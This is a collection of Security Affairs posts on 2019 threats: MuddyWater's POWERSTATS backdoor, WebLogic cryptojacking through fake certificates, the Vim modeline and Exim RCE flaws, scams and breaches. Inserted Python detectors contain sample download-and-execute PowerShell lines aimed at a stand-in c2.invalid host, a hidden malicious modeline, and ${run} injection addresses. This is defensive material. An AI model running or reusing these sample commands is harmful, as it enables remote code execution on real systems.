The threat actors continue to evolve their TTPs. A few weeks ago, Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted the use of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage POWERSTATS backdoor; the experts have already observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used compromised legitimate accounts to send out spear-phishing messages containing a document embedded with a malicious macro.


The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data is decoded and saved to the %PUBLIC% directory under various names with image file extensions such as .jpeg and .png. The attackers’ PowerShell code uses custom string obfuscation and junk code stubs to make analysis difficult.

Once all the strings are deobfuscated, the final backdoor code is revealed. The backdoor first gathers operating system (OS) information and saves the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exe process.”

The hackers can launch a second-stage attack by sending specific commands to the backdoor. The malicious code is also able to install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands, such as taking screenshots and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.

On the server side, the backdoor talks to C2 PHP scripts that use a hardcoded token and expose a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).
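As an added example (not Trend Micro's detection logic or any code from its report), the following Python triage scores PowerShell script-block text against the POWERSTATS v3 traits described above: a payload staged under %PUBLIC% with an image extension, Invoke-Expression, a GUID used as the victim identifier, a download call and an endless polling loop. The rule weights, the alert threshold, the c2.invalid host and the sample script blocks are all constructed for illustration.

```python
"""Heuristic triage of PowerShell script-block text against the POWERSTATS v3
traits described above. Added example; rule weights and samples are constructed."""
import re
from dataclasses import dataclass, field

# (rule name, weight, pattern). Weights and threshold are assumptions for this example.
RULES = [
    ("public_image_staging", 3,
     re.compile(r'''(?:\$env:PUBLIC|%PUBLIC%|\\Users\\Public\\)[^\s"']*\.(?:jpe?g|png)\b''', re.I)),
    ("invoke_expression", 2,
     re.compile(r"\bInvoke-Expression\b|(?<![\w-])IEX\b", re.I)),
    ("guid_identifier", 1, re.compile(r"\[guid\]::NewGuid\(\)", re.I)),
    ("download_call", 2,
     re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I)),
    ("endless_loop", 1, re.compile(r"\bwhile\s*\(\s*\$true\s*\)", re.I)),
]
ALERT_THRESHOLD = 5  # a single weak indicator never alerts on its own


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def triage(script_text: str) -> Verdict:
    """Score one script block; every matching rule adds its weight."""
    verdict = Verdict()
    for name, weight, pattern in RULES:
        if pattern.search(script_text):
            verdict.score += weight
            verdict.hits.append(name)
    return verdict


def triage_many(blocks: dict) -> dict:
    """Map block id -> Verdict for a batch of script blocks (e.g. pulled from event logs)."""
    return {block_id: triage(text) for block_id, text in blocks.items()}


# Constructed sample script blocks (not real malware, not the report's samples).
SAMPLES = {
    "benign-admin":
        'Get-ChildItem "$env:PUBLIC\\Documents" | Where-Object { $_.Length -gt 1MB }',
    "staged-image-payload":
        '$p = "$env:PUBLIC\\sys.jpeg"; $b = [IO.File]::ReadAllText($p); '
        'Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))',
    "guid-poller":
        '$id = [guid]::NewGuid().ToString(); $w = New-Object Net.WebClient; '
        'while($true){ try { $c = $w.DownloadString("http://c2.invalid/$id"); IEX $c } catch {}; Start-Sleep 60 }',
}

if __name__ == "__main__":
    for block_id, verdict in triage_many(SAMPLES).items():
        flag = "ALERT" if verdict.alert else "ok   "
        print(f"{flag} {block_id}: score={verdict.score} hits={verdict.hits}")
```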

Trend Micro observed an evolution of the malicious code used by the MuddyWater group: in March and April the hackers were using the heavily obfuscated POWERSTATS v2, but in May they deployed the new POWERSTATS v3.

The following table reports some of the campaigns observed by Trend Micro in H1 2019 with associated payloads and publicly available post-exploitation tools:


Discovery Date | Method for dropping malicious code | Type of files dropped | Final payload
2019-01 | Macros | EXE | SHARPSTATS
2019-01 | Macros | INF, EXE | DELPHSTATS
2019-03 | Macros | Base64 encoded, BAT | POWERSTATS v2
2019-04 | Template injection | Document with macros | POWERSTATS v1 or v2
2019-05 | Macros | VBE | POWERSTATS v3

It is interesting to note that the MuddyWater attackers are not using zero-day exploits in their campaigns; nevertheless, the threat actors continue to evolve their TTPs to avoid detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic, recently addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

The flaw is a deserialization remote command execution zero-day vulnerability that affects the Oracle WebLogic wls9_async and wlswsat components.

The issue affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April; unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious codes in certificate files to evade detection.


Once the malware is executed it exploits the CVE-2019-2725 flaw to execute a command and perform a series of routines. 

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chain starts with a PowerShell command that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then executes it with PowerShell. The downloaded file is then deleted using cmd.

The certificate file looks like a Privacy-Enhanced Mail (PEM) format certificate, but its content is a PowerShell command rather than an X.509 certificate in the usual TLS file format.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”
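As an added example (not Trend Micro's tooling), the following Python function checks whether a PEM-looking file actually carries a DER-encoded body or only text hidden behind the certificate wrapper, peeling base64 layer by layer because the file observed here had to be decoded twice. The DER-shaped bytes, the placeholder command and the c2.invalid host are constructed for the test, and the PowerShell keyword list is a heuristic assumption.

```python
"""Tell a PEM wrapper that carries a DER-encoded body apart from one that hides
text (here: a PowerShell command), peeling base64 layer by layer since the file
seen in this campaign had to be decoded twice. Added example; samples constructed."""
import base64
import binascii
import re

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
# Heuristic keyword list (assumption), used only to label recovered text as a script.
PS_HINTS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|New-Object\s+Net\.WebClient|powershell", re.I)


def der_sequence_spans(data: bytes) -> bool:
    """True if data starts with a DER SEQUENCE whose length field covers exactly the rest."""
    if len(data) < 2 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:                      # short form: length fits in one byte
        header, length = 2, first
    else:                                 # long form: next (first & 0x7F) bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or len(data) < 2 + n:
            return False
        header, length = 2 + n, int.from_bytes(data[2:2 + n], "big")
    return header + length == len(data)


def try_base64(data: bytes):
    """Strict base64 decode after dropping whitespace; None if the data is not base64."""
    compact = b"".join(data.split())
    if not compact or len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_pem(text: str, max_layers: int = 4) -> dict:
    """Return {'kind': 'der'|'script'|'text'|'binary-unknown'|'not-pem', 'layers': n, ...}."""
    match = PEM_RE.search(text)
    if not match:
        return {"kind": "not-pem", "layers": 0}
    label = match.group(1)
    current = match.group(2).encode()
    layers = 0
    while layers < max_layers:
        decoded = try_base64(current)
        if decoded is None:
            break
        layers += 1
        if der_sequence_spans(decoded):
            return {"kind": "der", "label": label, "layers": layers}
        current = decoded               # not DER: maybe another base64 layer, maybe text
    try:
        payload = current.decode("utf-8")
    except UnicodeDecodeError:
        return {"kind": "binary-unknown", "label": label, "layers": layers}
    kind = "script" if PS_HINTS.search(payload) else "text"
    return {"kind": kind, "label": label, "layers": layers, "payload": payload}


def pem_wrap(raw: bytes) -> str:
    """Wrap raw bytes in a CERTIFICATE PEM envelope (used to build the samples)."""
    return ("-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(raw).decode()
            + "-----END CERTIFICATE-----\n")


# Constructed samples: a minimal DER-shaped body (not a real certificate) and a
# placeholder command wrapped twice in base64, mirroring the double decode observed.
SAMPLE_DER = pem_wrap(b"\x30\x0b\x02\x01\x05\x04\x06constr")   # SEQUENCE{INTEGER 5, OCTET STRING}
SAMPLE_FAKE = pem_wrap(base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/update.ps1')"))

if __name__ == "__main__":
    for name, sample in (("der-shaped", SAMPLE_DER), ("fake-cert", SAMPLE_FAKE)):
        print(name, classify_pem(sample))
```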

The command in the certificate file is used by the crooks to download and execute another PowerShell script in memory. That script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script run in memory), Sysguard.exe (watchdog for the miner process), and Clean.bat (deletes other components).

Experts noticed that the update.ps1 file that contains the decoded certificate file is replaced with the new update.ps1 and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware in a certificate file is not new; experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system

Bad news for Linux users: a flaw tracked as CVE-2019-12735 allows attackers to compromise their systems by tricking them into opening a specially crafted file in the Vim or Neovim editor.

Security expert Armin Razmjou has recently found a high-severity vulnerability (CVE-2019-12735) in Vim and Neovim command-line text editing applications.

The vulnerability, tracked as CVE-2019-12735, is classified as an arbitrary OS command execution vulnerability. Both Vim and Neovim editing applications are pre-installed in Linux distros.

“Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.” reads the security advisory published by the expert.

Vim is a highly configurable text editor for efficiently creating and changing any kind of text, including documents and scripts.

With 30% less source code than Vim, the vision of Neovim is to enable new applications without compromising Vim’s traditional roles, while enhancing the user experience.

The vulnerability affects the way the Vim editor handles the “modelines” option. The modeline feature allows users to specify custom editor options near the start or end of a file (i.e. /* vim: set textwidth=80 tabstop=8: */). The feature is enabled by default and it is applied to all file types.

Only a subset of options is allowed in modelines; if an expression is included in an option value, it is evaluated in a sandbox.

Razmjou explained that it is possible to construct a modeline that executes code outside the sandbox.

“However, the :source! command (with the bang [!] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if typed manually, running them after the sandbox has been left.” continues the expert.

The expert demonstrated that by tricking a victim into opening a specially crafted file with Vim or Neovim it is possible to secretly execute commands on their Linux system and remotely take it over.

Razmjou published two proof-of-concept exploits to the public, one of which allows a remote attacker to gain access to a reverse shell.

“This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened.” continues the post. “Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with cat. (cat -v reveals the actual content.)”

Below the video PoC of the attack:


The Vim and Neovim development teams have already released security updates addressing the CVE-2019-12735 flaw: Vim patch 8.1.1365 and a Neovim patch included in v0.3.6.

The expert also suggests:

  • disabling the modelines feature,
  • disabling “modelineexpr” to disallow expressions in modelines,
  • using the “securemodelines” plugin, a secure alternative to Vim modelines.
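As an added example (not Razmjou's PoC and not Vim's own modeline parser), this Python scanner looks only at the first and last five lines of a file, where Vim reads modelines by default, and flags modelines that contain a source!/so! command, an expression-valued option (names ending in expr), or terminal escape sequences that would hide the line from cat. The sample files and the heuristics are constructed for illustration.

```python
"""Scan a file for Vim modelines in the only lines Vim reads them from (the first
and last 'modelines' lines, 5 by default) and flag the traits discussed above.
Added example; the heuristics and the sample files are constructed."""
import re
from dataclasses import dataclass

# Modeline marker: 'vi:', 'vim:', 'Vim:' or 'ex:' preceded by whitespace or line start.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$")
ESC_RE = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]")          # CSI terminal escape sequences
SOURCE_RE = re.compile(r"\bso(?:u|ur|urc|urce)?!")       # :so[urce]! with the bang modifier
EXPR_OPT_RE = re.compile(r"\b(\w*expr)=")                # foldexpr=, includeexpr=, ...


@dataclass
class Finding:
    line_no: int
    options: str
    reasons: list

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def scan_text(text: str, modelines: int = 5) -> list:
    """Return a Finding for every modeline found in the head/tail window."""
    lines = text.splitlines()
    n = len(lines)
    window = sorted(set(range(min(modelines, n))) | set(range(max(0, n - modelines), n)))
    findings = []
    for i in window:
        raw = lines[i]
        visible = ESC_RE.sub("", raw)       # strip escapes so a hidden marker is still found
        m = MODELINE_RE.search(visible)
        if not m:
            continue
        options = m.group(1)
        reasons = []
        if ESC_RE.search(raw):
            reasons.append("escape sequences hide the modeline from cat")
        if SOURCE_RE.search(options):
            reasons.append("source!/so! sandbox bypass command")
        for name in EXPR_OPT_RE.findall(options):
            reasons.append(f"expression-valued option {name}")
        findings.append(Finding(i + 1, options.strip(), reasons))
    return findings


# Constructed samples: a clean C file with the page's own modeline, a file whose
# second line hides a modeline behind escape sequences, and a modeline placed
# outside the window (which Vim would ignore as well).
FILLER = "\n".join(["filler"] * 20)
SAMPLES = {
    "clean.c": "#include <stdio.h>\nint main(void) { return 0; }\n/* vim: set textwidth=80 tabstop=8: */\n",
    "hidden.txt": "just a note\n\x1b[?7l\x1b[1G vim: set foldexpr=0 so! ft=c: \x1b[?7h\n" + FILLER + "\n",
    "middle.txt": FILLER + "\n vim: set so!: \n" + FILLER + "\n",
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        for f in scan_text(content):
            print(name, f.line_no, "SUSPICIOUS" if f.suspicious else "ok", f.reasons)
```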

Below the timeline of the flaw:

  • 2019-05-22 Vim and Neovim maintainers notified
  • 2019-05-23 Vim patch released
  • 2019-05-29 Neovim patch released
  • 2019-06-05 CVE ID CVE-2019-12735 assigned

Pierluigi Paganini

(SecurityAffairs – CVE-2019-12735, hacking)

The post CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system appeared first on Security Affairs.

CIA sextortion campaign, analysis of a well-organized scam

Crooks are posing as CIA agents in a sextortion campaign, they are sending emails to inform the victims of an investigation into online pedophilia rings.

Crooks are posing as CIA agents in a new sextortion campaign, they are sending emails to inform potential victims of an ongoing investigation into online pedophilia rings.

Fraudsters are offering to drop the investigations on the victims for money, according to experts at Kaspersky.

“The author of the e-mails that caught our experts’ collective eye poses as a CIA officer who has allegedly found the recipient’s details in Case #45361978 (relating to possession and distribution of child pornography, or so it seems).” reads a post published by Kaspersky. “The “officer” states that the CIA is about to swoop in on more than 2,000 individuals suspected of pedophilia in 27 countries around the globe. The message implies that the recipient is accused of being one of them.”

Crooks claim they are conducting a “large international operation set to arrest more than 2000 individuals in 27 countries.”

To scare people and trick them into paying, the fraudsters claim to have collected evidence of the illegal activities: they tell the victims that they have the mark’s home and work addresses and contact information, and they also claim to have recorded each recipient’s ISP and browsing history, social media activity, chat logs, and Tor browsing activity.

The fake CIA agents are offering to drop the investigation and destroy the evidence for a $10,000 Bitcoin payout.

“I read the documentation and I know you are a wealthy person who may be concerned about reputation,” reads the scam email message sent to the victims. “I am one of several people who have access to those documents and I have enough security clearance to amend and remove your details from this case.”

Sextortion campaigns are not new in the threat landscape; in most cases the victims fear reputational damage if the hackers expose their immoral habits to friends and colleagues.

The messages used in the “CIA” sextortion campaign are well written with a good layout, and they appear authentic.

“Such messages are sent to thousands or even millions of people in the hope that just a handful will swallow the bait,” explained Kaspersky senior anti-spam analyst Tatyana Scherbakova.

“Given the size of the ransom, if even a few victims pay up, it will have been worth the cybercriminals’ time and effort.”

Below the recommendations provided by Kaspersky:

  • Never pay scammers; that would only encourage the extortionists even more.
  • Do not respond to the e-mail, even if you really want to prove to the author that your name is in the “case file” by mistake. By doing so, you would be confirming that your address is valid and provoke an even greater wave of spam. For the same reason, do not try to troll the scammers.
  • Close the message and mark it as spam — this will help the spam filter to do its job better.

Pierluigi Paganini

(SecurityAffairs – sextortion, scam)

The post CIA sextortion campaign, analysis of a well-organized scam appeared first on Security Affairs.

Retro video game website Emuparadise suffered a data breach

Retro video game website Emuparadise revealed that it suffered a data breach that exposed 1.1 million accounts back in April 2018.

Emuparadise is a website that offered tons of ROMs, ISOs and retro video games; users could download and play them with an emulator or play them in the web browser.

The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.

Since August 2018, Emuparadise no longer hosts game ROMs; however, it has continued to offer all kinds of information about retro video games and to operate community forums.


Over the weekend, some Emuparadise forum members reported receiving data breach notifications from the popular services Have I Been Pwned and HackNotice. The notices inform them of the security breach and that their data were exposed as part of the incident that occurred in April 2018.

The notice issued by the service Have I Been Pwned states that 1,131,229 accounts from the Emuparadise forums were exposed in an incident that occurred in April 2018. The forums run on vBulletin, a very popular forum platform whose older versions are known to be vulnerable to several issues.

HIBP received the data from dehashed.com on June 9th, 2019; the exposed information includes email addresses, IP addresses, usernames and passwords stored as salted MD5 hashes.

“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emuparadise, suffered a data breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.”

At the time of writing, it is not known how DeHashed obtained the huge trove of data.

Experts pointed out that the Emuparadise data have been offered for sale in the cybercrime underground and on hacking forums since early 2019.

Pierluigi Paganini

(SecurityAffairs – Emuparadise, hacking)

The post Retro video game website Emuparadise suffered a data breach appeared first on Security Affairs.

Spain extradites 94 Taiwanese to China phone and online fraud charges

Spanish authorities extradited 94 Taiwanese to China to face telephone and online fraud charges, Taiwan’s Foreign Ministry expressed a strong regret.

Spain extradited 94 Taiwanese to China to face telephone and online fraud charges; the suspects were transported by plane under official escort.

“The suspects arrived Friday morning at Beijing airport on a chartered flight. Footage on state broadcaster CCTV showed uniformed officers escorting them off the China Eastern plane one-by-one.” reads a post published by the AP press.

The Taiwan Central News Agency reported that Taiwan’s Foreign Ministry expressed “serious concern and strong regret.”

The investigation into the scam operations in Spain started in 2016; the crooks targeted victims in China. A joint operation conducted by Chinese and Spanish police allowed the identification of the people involved. In December, authorities raided 13 sites in Madrid, Barcelona and other cities in Spain.

These arrests could be considered as the result of the first joint operation conducted by China with a European country against telecom fraud.

According to the Chinese Public Security Ministry, the telephone and online frauds allowed the suspects to earn 120 million yuan ($17 million).

In the fraud scheme, the criminals impersonate Chinese authorities and attempt to trick victims into transferring money to accounts controlled by the scammers.

“Similar scams operate from several countries and usually prey on Chinese.” continues the AP. “The callers typically masquerade as Chinese authorities and pressure or persuade the victims to transfer money to the scammers’ accounts.”

Spanish authorities have already extradited 225 suspects, 218 of whom are Taiwanese.

Even though Taiwan split from China in 1949 during a civil war, Beijing still considers the island part of its territory. The two governments signed an agreement in 2009 to join efforts in the fight against crime.

The tension between the two sides peaked after the election of Taiwanese President Tsai Ing-wen, who is not considered aligned with Chinese politics.

Chinese authorities have asked foreign countries, including Spain, to transfer the criminals to China, where they would face severe sentences.

Taiwan evidently disagrees with the Spanish authorities’ decision to extradite the suspects to China rather than to Taiwan.

Liu Zhongyi, the deputy director of the Chinese Criminal Investigation Bureau, highlighted the difficulties associated with international investigations that involve the different legal frameworks of different states, such as China and Spain.

“We have overcome various difficulties,” Zhongyi told CCTV.

Liu explained that many other criminal gangs operating in the China-Myanmar border area and in Southeast Asia are targeting Chinese citizens.

Pierluigi Paganini

(SecurityAffairs – phone scam, online fraud)

The post Spain extradites 94 Taiwanese to China phone and online fraud charges appeared first on Security Affairs.

Millions of Exim mail servers vulnerable to cyber attacks

Millions of Exim mail servers are exposed to attacks due to a critical vulnerability that makes it possible for unauthenticated remote attackers to execute arbitrary commands.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The vulnerability, tracked as CVE-2019-10149, resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

“In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved.” reads the security advisory published by Qualys. “This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations).”

The CVE-2019-10149 flaw was called ‘The Return of the WIZard’, a reference to Sendmail’s ancient WIZ and DEBUG vulnerabilities.

The flaw is easily exploitable by a local attacker, and by a remote attacker in certain non-default configurations; experts believe that threat actors will start using it in attacks in the wild.

Experts explained that, in order to remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days, transmitting one byte every few minutes; however, the experts cannot guarantee that this is the only exploitation method.

Experts pointed out that the following non-default Exim configurations could be easily exploited by a remote attacker:

  • If the “verify = recipient” ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely.
  • If Exim was configured to recognize tags in the local part of the recipient’s address (via “local_part_suffix = +* : -*” for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “balrog+${run{…}}@localhost” (where “balrog” is the name of a local user).
  • If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “${run{…}}@khazad.dum” (where “khazad.dum” is one of Exim’s relay_to_domains). Indeed, the “verify = recipient” ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part.
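As an added defensive illustration (written for this page, not code from Qualys or the Exim project), the following Python flags an Exim version banner in the affected 4.87 to 4.91 range and scans mail-log lines for RCPT TO addresses whose local part carries a `${...}` expansion item, the part of a relayed address that, as the advisory notes, recipient verification does not check. The log format and addresses are constructed.

```python
import re
from typing import List, Optional, Tuple

# Affected range from the advisory: Exim 4.87 through 4.91; 4.92 carries the fix.
AFFECTED_MIN = (4, 87)
FIXED_IN = (4, 92)


def parse_exim_version(banner: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from an Exim version string or SMTP greeting banner.
    Returns None when no 'N.NN' version token is present."""
    m = re.search(r"\b(\d+)\.(\d+)\b", banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_affected_version(banner: str) -> bool:
    """True when the parsed version falls inside the vulnerable range."""
    v = parse_exim_version(banner)
    return v is not None and AFFECTED_MIN <= v < FIXED_IN


# Exim string-expansion items look like "${item{...}}"; a legitimate recipient
# local part has no reason to contain one.
EXPANSION_ITEM = re.compile(r"\$\{[a-z]+\{")


def suspicious_local_part(address: str) -> bool:
    """True when the local part (before the last '@') contains an expansion item.
    The local part is inspected deliberately: for relayed domains the
    'verify = recipient' ACL only checks the domain part."""
    local_part, sep, _domain = address.rpartition("@")
    if not sep:
        local_part = address
    return EXPANSION_ITEM.search(local_part) is not None


RCPT_RE = re.compile(r"RCPT TO:\s*<([^>]*)>", re.IGNORECASE)


def scan_rcpt_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, address) for every RCPT TO whose local part
    carries an expansion item."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for addr in RCPT_RE.findall(line):
            if suspicious_local_part(addr):
                hits.append((n, addr))
    return hits


# Constructed sample log (not a real Exim log); the expansion bodies are placeholders.
SAMPLE_LOG = [
    "2019-06-10 10:00:01 SMTP< RCPT TO:<alice@example.org>",
    "2019-06-10 10:00:02 SMTP< RCPT TO:<balrog+${run{...}}@localhost>",
    "2019-06-10 10:00:03 SMTP< RCPT TO:<${run{...}}@khazad.dum>",
]

if __name__ == "__main__":
    print(is_affected_version("220 mail ESMTP Exim 4.91 Mon, 10 Jun 2019"))
    for line_no, addr in scan_rcpt_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious recipient {addr}")
```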

The CVE-2019-10149 flaw was addressed by Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of systems are still running affected versions.

Querying Shodan for vulnerable versions of Exim, it is possible to find 4,353,180 installs, most of them in the United States (2,462,098).

Searching for patched Exim installs running the 4.92 release we can find 1,071,818 systems.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers vulnerable to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Once again thank you!

ESET analyzes Turla APT's usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRig's Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of millions of patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day
Analyzing the APT34's Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users' funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

Critical RCE affects older Diebold Nixdorf ATMs

Automated teller machine vendor Diebold Nixdorf has released security updates to address a remote code execution vulnerability in older ATMs.

Diebold Nixdorf discovered a remote code execution vulnerability in older ATMs and is urging its customers to install the security updates it has released to address the flaw.

The vulnerability affects older Opteva model ATMs; Diebold Nixdorf will start notifying customers next week.

The security research group NightSt0rm published technical details about the vulnerability in a blog post on Medium. The experts explained that they had access to a Diebold ATM and started analyzing the machine, a simple PC running a Windows OS and exposing some services implemented by the ATM vendor. They focused their analysis on the Spiservice service listening on port 8043.

“Look at the output of command, there is a service (Spiservice) which running on port 8043. The SpiService.exe is associated with XFS, the Extension for Financial Services DLL library (MSXFS.dll) that is specifically used by ATMs.” reads the post published by the experts. “The library provides a special API for the communication with the ATM’s PIN pad and the cash dispenser.”

The ATM tested by the experts was running Agilis XFS for Opteva version 4.1.61.1. Attempting to connect to the service via a web browser, the experts noticed it loads many libraries, including one called VDMXFS.dll.

According to Diebold Nixdorf, this service only runs on Opteva version 4.x software; later versions are not affected.

The application uses RemotingConfiguration.Configure and accepts “server.config” as the parameter from which it loads its configuration. Analyzing the file, the experts discovered that the program relies on .NET Remoting, a technique that allows different applications to communicate with each other.

The researchers created two applications to interact remotely with the service and captured the network traffic; in this way they found that the application uses an HTTP SOAP protocol for the communication.

The ATM maker released Agilis XFS for Opteva – BulkCashRec (BCRM) version 4.1.22 that doesn’t expose the service’s configuration online.

The experts pointed out that this attack could be prevented by properly configuring the terminal-based firewall that is included in the older versions of Opteva ATMs. The good news is that the firewall is enabled by default, which means that only ATM owners that disabled it are at risk.

